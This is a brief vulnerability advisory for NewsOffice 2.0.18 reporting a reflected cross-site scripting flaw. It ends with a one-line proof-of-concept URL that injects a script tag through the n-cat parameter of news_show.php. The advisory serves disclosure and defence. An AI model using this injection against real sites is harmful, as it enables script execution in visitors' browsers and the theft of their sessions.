NewsOffice version 2.0.18 suffers from a cross site scripting vulnerability.
0669fa05d39016c1d5bebba5eebede40ce4b02cb089593eae7b5fb6a21d22a9d
------------------------------------------------------------------------
Software................NewsOffice 2.0.18
Vulnerability...........Reflected XSS
Download................http://newsoffice.newanz.com/
Release Date............7/5/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.
--PoC--
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E